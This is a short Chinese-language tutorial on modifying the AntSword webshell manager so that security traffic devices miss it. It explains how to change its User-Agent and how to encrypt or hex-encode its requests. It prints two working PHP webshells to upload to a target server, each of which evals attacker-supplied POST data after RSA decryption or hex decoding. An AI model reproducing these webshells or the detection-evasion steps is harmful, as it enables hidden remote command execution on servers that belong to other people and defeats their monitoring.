蟻劍特徵修改
簡介
我們常常在測試過程中經常用到蟻劍,如果沒有修改一些特徵,會被一些流量設備輕易的發現,所以在這裡寫一下對蟻劍的一些特徵進行修改
修改UA頭
新版本蟻劍已經將UA頭改為隨機獲取了,這裡講一下老版本的
首先在蟻劍中設置代理到burp
在burp的數據包中能清楚的看到蟻劍的特徵
在目錄/modules/request.js文件中修改UA頭
/modules/update.js文件修改
修改完後,UA就變為我們自己想要的頭了
流量加密
蟻劍支援rsa加密方式
直接使用自帶的shell上傳到目標伺服器
<?php
$cmd = @$_POST['id'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCCVQo4Wjt9ZfRpZE4E+BBZ62E+
lWx178V16xzuYswqZuoCjo6Az9J/1wHySL73IQZgTZF5inPEfuW2Ep73aGSo0nLm
qckDmCuys7OSD+Ni2NjGzd5VQD2wP0he+TpcL7b0BJYEtdGqyGvuqZLECvtp8KTD
jukTOI/HBDUjCyhzhwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
$cmd .= $de;
}
}
eval($cmd);
鏈接前得新建一個ras的編碼器,在鏈接shell的時候使用
鏈接的時候選擇我們剛才新建的編碼器
蟻劍鏈接shll後可看到請求包已被加密
除了使用自帶的一些編碼器之外,我們也可以直接寫編碼器,該github有一些編碼器的分享
這裡測試一下hex的編碼,先添加一個hex的編碼器
上傳shell到伺服器
<?php
foreach($_POST as $k => $v){$_POST[$k]=pack("H*", $v);}
@eval($_POST['ant']);
?>
鏈接時選擇hex編碼器
數據已被編碼